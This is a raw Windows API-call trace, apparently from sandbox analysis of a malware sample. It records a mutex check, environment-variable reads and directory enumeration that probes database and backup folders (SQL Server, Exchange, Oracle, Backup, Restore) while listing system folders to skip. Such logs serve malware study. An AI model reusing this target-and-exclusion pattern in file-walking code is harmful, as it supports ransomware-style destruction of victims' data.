(hMem=0x450004) returned 0x58a000 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.252] FindNextFileW (in: hFindFile=0x587da0, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0104.252] 
FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0104.252] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.252] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.252] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.252] GlobalUnlock (hMem=0x45000c) returned 0 [0104.252] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.252] GlobalUnlock (hMem=0x450004) returned 0 [0104.252] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.253] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.253] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.253] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.253] SysReAllocStringLen (in: pbstr=0x18f444*=0x0, psz="C:\\Program Files\\Common Files\\DESIGNER", len=0x26 | out: pbstr=0x18f444*="C:\\Program Files\\Common Files\\DESIGNER") returned 1 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.253] GlobalLock (hMem=0x450004) returned 0x58c010 
[0104.253] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft\\Exchange Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="䱈@VV企@\x18㽜V\x18\x1b")) returned 0xffffffff [0104.254] GetLastError () returned 0x3 [0104.254] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ Compact Edition\\") returned 21 [0104.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft SQL Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㼔V\x181")) returned 0xffffffff [0104.255] GetLastError () returned 0x2 [0104.255] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ Compact Edition\\") returned 9 [0104.255] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Firebird", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㟄X\x18;")) returned 0xffffffff [0104.256] GetLastError () returned 0x2 [0104.256] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ Compact 
Edition\\") returned 8 [0104.256] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSSQL.1", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㥔X\x18D")) returned 0xffffffff [0104.256] GetLastError () returned 0x2 [0104.257] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.257] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@嵤W企@\x18V\x18j")) returned 0xffffffff [0104.257] GetLastError () returned 0x2 [0104.257] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common 
Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Adobe", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@应W企@\x18㟄X\x18q")) returned 0xffffffff [0104.258] GetLastError () returned 0x2 [0104.258] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="adobe\\V`") returned 6 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Oracle", lpFindFileData=0x18eec0 | out: 
lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@巼W企@\x18㥔X\x18y")) returned 0xffffffff [0104.259] GetLastError () returned 0x2 [0104.259] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.259] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Archive", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.259] GetLastError () returned 0x2 [0104.260] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Backup", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@应W企@\x18㥔X\x18\x88")) returned 0xffffffff [0104.299] GetLastError () returned 0x2 [0104.299] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Reserv", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, 
ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@巼W企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.299] GetLastError () returned 0x2 [0104.299] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="reserv㥐X\x10") returned 6 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.300] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Restore", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㥔X\x18\x97")) returned 0xffffffff [0104.300] GetLastError () returned 0x2 [0104.300] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.300] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.300] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.300] GlobalUnlock 
(hMem=0x450004) returned 0 [0104.300] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.300] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.300] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.300] GlobalUnlock (hMem=0x450004) returned 0 [0104.300] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.300] GlobalUnlock (hMem=0x45000c) returned 0 [0104.300] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.300] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js 
halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.302] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.302] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.302] GlobalUnlock (hMem=0x45000c) returned 0 [0104.302] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.302] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.302] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.302] GlobalUnlock (hMem=0x45000c) returned 0 [0104.302] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.302] GlobalUnlock (hMem=0x450004) returned 0 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL 
Server Compact Edition\\ition\\") returned 11 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=10, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.304] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.304] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.304] SHGetMalloc (in: ppMalloc=0x18f10c | out: ppMalloc=0x18f10c*=0x767666bc) returned 0x0 [0104.304] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f108 | out: ppidl=0x18f108) returned 0x0 [0104.304] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.305] SysReAllocStringLen (in: pbstr=0x18f190*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f190*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.305] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.305] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.305] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.305] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.305] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.306] GlobalUnlock (hMem=0x450004) returned 0 [0104.306] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.306] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.306] GlobalHandle 
(pMem=0x58a000) returned 0x450004 [0104.306] GlobalUnlock (hMem=0x450004) returned 0 [0104.306] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.306] GlobalUnlock (hMem=0x45000c) returned 0 [0104.306] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5733f0 [0104.306] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, 